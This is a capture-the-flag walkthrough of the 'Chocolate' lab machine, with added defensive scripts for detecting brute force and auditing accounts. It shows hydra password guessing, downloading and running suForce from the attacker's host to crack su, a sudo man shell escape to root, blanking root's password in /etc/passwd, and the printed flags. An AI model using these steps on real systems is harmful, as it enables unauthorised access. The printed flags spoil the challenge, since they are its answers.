TheHackersLabs Chocolate: Detailed Machine Writeup (WP)
城南花已开

Information Gathering

Service Discovery

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.147 08:00:27:f0:c7:e6 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.949 seconds (131.35 hosts/sec). 4 responded
export ip=192.168.60.147
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.147:22
Open 192.168.60.147:21
Open 192.168.60.147:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 19:31 CST
Initiating ARP Ping Scan at 19:31
Scanning 192.168.60.147 [1 port]
Completed ARP Ping Scan at 19:31, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:31
Scanning 192.168.60.147 [3 ports]
Discovered open port 22/tcp on 192.168.60.147
Discovered open port 21/tcp on 192.168.60.147
Discovered open port 80/tcp on 192.168.60.147
Completed SYN Stealth Scan at 19:31, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.147
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-01-08 19:31:16 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:F0:C7:E6 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
```

Port 80 is open. Visiting it shows only the default Apache page.

Next, enumerate directories.

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 279]
/web (Status: 301) [Size: 314] [--> http://192.168.60.147/web/]
Progress: 4734 / 4735 (99.98%)
===============================================================
Finished
===============================================================
```

The /web directory gives us a username, bob, along with some other hints.

Let's check FTP for information, starting with an anonymous login attempt.

```
❯ ftp anonymous@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
❯ ftp bob@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
```

FTP Brute Force

Both logins require a password, so there is nothing for it but to brute-force.

The password comes back as chocolate.

```
❯ hydra -l bob -P /usr/share/wordlists/rockyou.txt ftp://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-08 19:36:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.60.147:21/
[21][ftp] host: 192.168.60.147 login: bob password: chocolate
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-08 19:36:4
```

Log in and look around: there is a user.txt we cannot read and a shell script.

Grab the script first.

```
❯ ftp bob@$ip
Connected to 192.168.60.147.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||21262|)
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 352 May 16 2024 limpieza.sh
-r-------- 1 0 0 33 May 16 2024 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||63369|)
550 Failed to open file.
ftp> get limpieza.sh
local: limpieza.sh remote: limpieza.sh
229 Entering Extended Passive Mode (|||59392|)
150 Opening BINARY mode data connection for limpieza.sh (352 bytes).
100% |*********************************************************************************************************| 352 265.85 KiB/s 00:00 ETA
226 Transfer complete.
352 bytes received in 00:00 (129.42 KiB/s)
ftp>
```

Let's look at the file.

```bash
cat limpieza.sh
#!/bin/bash

# Temporary directories to sweep, including the calling user's runtime directory
temp_directories=("/tmp" "/var/tmp" "/run/user/$UID")

# File-name patterns treated as disposable
file_patterns=("*.tmp" "*.temp" "*.bak" "*.swp")

echo "Eliminando archivos temporales..."

for dir in "${temp_directories[@]}"; do
    for pattern in "${file_patterns[@]}"; do
        find "$dir" -type f -name "$pattern" -delete
    done
done

echo "Archivos temporales eliminados."
```

The script does the following:

- Walks several temporary directories on the system (/tmp, /var/tmp, and the current user's runtime directory /run/user/$UID).
- Finds the files in them whose names match the given patterns (*.tmp, *.temp, *.bak, *.swp).
- Deletes every matching file it finds.
- Prints a message before it starts and another when it finishes.

This confirms the hint picked up from the web directory: it is an automated cleanup job.

User Privilege Escalation

The question is how we get a shell.

It turns out the FTP user can also log in over SSH.

```
❯ ssh bob@$ip
The authenticity of host '192.168.60.147 (192.168.60.147)' can't be established.
ED25519 key fingerprint is SHA256:d+b+JzmZGkN9nhLEz9cgbjCNit44x/YzVyQylzU82RQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.147' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux chocolate 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bob@chocolate:~$ ls
limpieza.sh user.txt
bob@chocolate:~$ cat user.txt
cat: user.txt: Permiso denegado
```

Notice that the FTP directory is exactly this user's home directory.

More Information Gathering

There is another user on the box, secretote.

```
bob@chocolate:~$ id
uid=1001(bob) gid=1001(bob) grupos=1001(bob),100(users)
bob@chocolate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
…………… (omitted) ……………
bob:x:1001:1001:bob,,,:/home/bob:/bin/bash
mongodb:x:103:65534::/nonexistent:/usr/sbin/nologin
secretote:x:1002:1002:secretote,,,:/home/secretote:/bin/bash
```

I went straight for suForce to brute-force it on the box, since I didn't want to drop out of the SSH session; it's just rather slow.

The password is chocolate1.

```
bob@chocolate:/tmp$ wget 192.168.60.100/suForce
--2025-01-08 12:50:22-- http://192.168.60.100/suForce
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2430 (2,4K) [application/octet-stream]
Grabando a: «suForce»

suForce 100%[=======================================================================>] 2,37K --.-KB/s en 0s

2025-01-08 12:50:22 (256 MB/s) - «suForce» guardado [2430/2430]

bob@chocolate:/tmp$ wget 192.168.60.100/techyou.txt
--2025-01-08 12:50:34-- http://192.168.60.100/techyou.txt
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 161891 (158K) [text/plain]
Grabando a: «techyou.txt»

techyou.txt 100%[=======================================================================>] 158,10K --.-KB/s en 0,007s

2025-01-08 12:50:34 (23,7 MB/s) - «techyou.txt» guardado [161891/161891]
bob@chocolate:/tmp$ ./suForce -u secretote -w techyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | secretote
📖 Wordlist | techyou.txt
🔎 Status | 1469/20000/7%/chocolate1
💥 Password | chocolate1
───────────────────────────────────
```
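From the defender's side, the two guessing runs above (hydra against vsftpd, then suForce against su) leave a characteristic trace: one failure line per guess against the same account, then a success. The following is an added example, not part of the writeup or of either tool, that runs a threshold detector over constructed vsftpd.log and auth.log lines modelled on those daemons' formats; the lines, PIDs and timestamps are made up.

```python
import re
from collections import Counter

# Constructed sample logs (not captured from the lab machine). vsftpd writes one
# line per login attempt; su(1) logs to the syslog auth facility.
VSFTPD_LOG = """\
Wed Jan  8 19:36:40 2025 [pid 1200] [bob] FAIL LOGIN: Client "192.168.60.100"
Wed Jan  8 19:36:40 2025 [pid 1203] [bob] FAIL LOGIN: Client "192.168.60.100"
Wed Jan  8 19:36:41 2025 [pid 1205] [bob] FAIL LOGIN: Client "192.168.60.100"
Wed Jan  8 19:36:41 2025 [pid 1207] [bob] OK LOGIN: Client "192.168.60.100"
Wed Jan  8 19:40:02 2025 [pid 1302] [alice] OK LOGIN: Client "192.168.60.20"
"""
AUTH_LOG = """\
Jan  8 12:51:01 chocolate su: FAILED SU (to secretote) bob on pts/0
Jan  8 12:51:01 chocolate su: FAILED SU (to secretote) bob on pts/0
Jan  8 12:51:02 chocolate su: FAILED SU (to secretote) bob on pts/0
Jan  8 12:51:02 chocolate su: (to secretote) bob on pts/0
Jan  8 12:55:10 chocolate su: (to root) secretote on pts/0
"""

# vsftpd: '[user] FAIL LOGIN: Client "addr"' and '[user] OK LOGIN: Client "addr"'
FTP_FAIL = re.compile(r'\[(?P<user>[^\]]+)\] FAIL LOGIN: Client "(?P<src>[^"]+)"')
FTP_OK = re.compile(r'\[(?P<user>[^\]]+)\] OK LOGIN: Client "(?P<src>[^"]+)"')
# su: 'FAILED SU (to target) user on tty' and '(to target) user on tty'
SU_FAIL = re.compile(r'su: FAILED SU \(to (?P<target>\S+)\) (?P<user>\S+) on')
SU_OK = re.compile(r'su: \(to (?P<target>\S+)\) (?P<user>\S+) on')

def brute_force_report(log, fail_re, ok_re, key, threshold=3):
    """Count failures per key (who is guessing, against what) and record whether a
    success followed once the threshold was reached. Only keys at or over the
    threshold are returned: {key: (failures, succeeded_afterwards)}."""
    fails, succeeded = Counter(), set()
    for line in log.splitlines():
        if m := fail_re.search(line):
            fails[key(m)] += 1
        elif (m := ok_re.search(line)) and fails[key(m)] >= threshold:
            succeeded.add(key(m))
    return {k: (n, k in succeeded) for k, n in fails.items() if n >= threshold}

def ftp_report(log=VSFTPD_LOG, threshold=3):
    """Guessing against the FTP daemon, keyed by (account, source address)."""
    return brute_force_report(log, FTP_FAIL, FTP_OK, lambda m: (m["user"], m["src"]), threshold)

def su_report(log=AUTH_LOG, threshold=3):
    """Local guessing through su, keyed by (calling user, target account)."""
    return brute_force_report(log, SU_FAIL, SU_OK, lambda m: (m["user"], m["target"]), threshold)
```

A real hydra run at 16 parallel tasks produces far more failure lines than the three shown, so the threshold mainly filters out typos by legitimate users.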

Switching User

```
bob@chocolate:/tmp$ su secretote
Contraseña:
secretote@chocolate:/tmp$ cd ~
secretote@chocolate:~$ ls -al
total 20
drwx------ 2 secretote secretote 4096 may 16 2024 .
drwxr-xr-x 5 root root 4096 may 16 2024 ..
-rw-r--r-- 1 secretote secretote 220 may 16 2024 .bash_logout
-rw-r--r-- 1 secretote secretote 3526 may 16 2024 .bashrc
-rw-r--r-- 1 secretote secretote 807 may 16 2024 .profile
secretote@chocolate:~$ sudo -l
[sudo] contraseña para secretote:
Matching Defaults entries for secretote on chocolate:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User secretote may run the following commands on chocolate:
(ALL : ALL) /usr/bin/man
```

Root Privilege Escalation

secretote has sudo rights to run man.

So escalating through man wraps it up.

```
secretote@chocolate:~$ sudo /usr/bin/man man
!/bin/bash
root@chocolate:/home/secretote# id
uid=0(root) gid=0(root) grupos=0(root)
root@chocolate:/home/secretote# cat /root/root.txt
3e3fe08f2c9be56153e6e470199787c5
```

But one question: why can't I read user.txt when I'm clearly root?

```
root@chocolate:/home# cat /home/bob/user.txt
cat: /home/bob/user.txt: Permiso denegado
```
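The writeup leaves this question open. As an added diagnostic (not from the original post), the script below separates what classic Unix permissions (DAC) allow from what the kernel actually granted: when DAC says a uid-0 process may read a 0400 root-owned file but open() is still refused, the denial comes from another layer, such as a mandatory access control label the shell inherited from a confined parent (Debian ships an AppArmor profile for man), an ACL, or a mount option. The path is the only input; everything else is read from /proc/self, and the function names are mine.

```python
import os
import stat

CAP_DAC_OVERRIDE = 1  # bit index in the CapEff mask (<linux/capability.h>)

def dac_read_allowed(mode, uid, gid, euid, egid, groups=(), dac_override=False):
    """Classic Unix (DAC) read check: owner bits if the caller owns the file, else
    group bits if it is in the file's group, else other bits. CAP_DAC_OVERRIDE,
    which an ordinary root shell holds, bypasses all three."""
    if dac_override:
        return True
    if euid == uid:
        return bool(mode & stat.S_IRUSR)
    if egid == gid or gid in groups:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

def proc_self(name, default):
    """Contents of one small /proc/self file, or default where it is unavailable."""
    try:
        with open(f"/proc/self/{name}") as f:
            return f.read()
    except OSError:
        return default

def has_dac_override():
    """True if CAP_DAC_OVERRIDE is in this process's effective capability set."""
    for line in proc_self("status", "").splitlines():
        if line.startswith("CapEff:"):
            return bool((int(line.split()[1], 16) >> CAP_DAC_OVERRIDE) & 1)
    return False

def explain_read_denial(path):
    """Compare what DAC permits with what the kernel actually allowed; if DAC says
    yes but open() is refused, the denial comes from another layer."""
    st = os.stat(path)
    dac = dac_read_allowed(st.st_mode, st.st_uid, st.st_gid, os.geteuid(),
                           os.getegid(), os.getgroups(), has_dac_override())
    try:
        with open(path, "rb"):
            readable = True
    except PermissionError:
        readable = False
    verdict = ("readable" if readable else
               "DAC allows but the kernel refused: check MAC label, ACLs, mount options"
               if dac else "denied by DAC: mode and owner do not permit this uid")
    return {"mode": stat.filemode(st.st_mode), "owner": (st.st_uid, st.st_gid),
            "mac_label": proc_self("attr/current", "unavailable").strip("\n\0") or "unconfined",
            "dac_allows": dac, "readable": readable, "verdict": verdict}
```

Run it from the shell that was refused and again from a plain root shell: a different mac_label between the two runs is the first thing to look at.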

No idea, so I simply removed root's password, then exited and switched user to check.

```
root@chocolate:/home# vi /etc/passwd
root::0:0:root:/root:/bin/bash   ## the "x" removed
secretote@chocolate:~$ su root
root@chocolate:/home/secretote# id
uid=0(root) gid=0(root) grupos=0(root)
root@chocolate:/home/secretote# cat /home/bob/user.txt
833558da8260cd75d29d311240fd21e0
```

Now it can be read.
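Blanking root's password field turns a locked account into one that, as the writeup demonstrates, a local user can su to with no password at all: when the field is not "x", pam_unix takes the (empty) hash from /etc/passwd and never consults the shadow entry. The added audit below, not part of the writeup, flags that state and its neighbours in constructed /etc/passwd and /etc/shadow excerpts modelled on the machine; the hashes and dates are placeholders.

```python
# Constructed excerpts modelled on the writeup: root's passwd field has been blanked
# as the author did, and secretote is given an empty shadow hash for contrast.
PASSWD = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1001:1001:bob,,,:/home/bob:/bin/bash
secretote:x:1002:1002:secretote,,,:/home/secretote:/bin/bash
"""
SHADOW = """\
root:!:19859:0:99999:7:::
daemon:*:19859:0:99999:7:::
bob:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASH:19859:0:99999:7:::
secretote::19859:0:99999:7:::
"""

def audit_accounts(passwd_text, shadow_text=""):
    """Return (account, finding) pairs for authentication weaknesses visible in the
    account databases: empty password fields (login without a password), hashes
    kept in world-readable /etc/passwd, and accounts with no shadow record."""
    shadow = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            shadow[fields[0]] = fields[1]
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed /etc/passwd entry"))
            continue
        name, pw = fields[0], fields[1]
        if pw == "":
            findings.append((name, "empty password field in /etc/passwd: no password required, shadow never consulted"))
        elif pw == "x":
            if name not in shadow:
                findings.append((name, "no /etc/shadow entry"))
            elif shadow[name] == "":
                findings.append((name, "empty password field in /etc/shadow"))
        else:
            findings.append((name, "password hash stored in world-readable /etc/passwd"))
    return findings
```

Locked accounts ("!" or "*" in shadow) produce no finding, which is the state root should have been left in.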
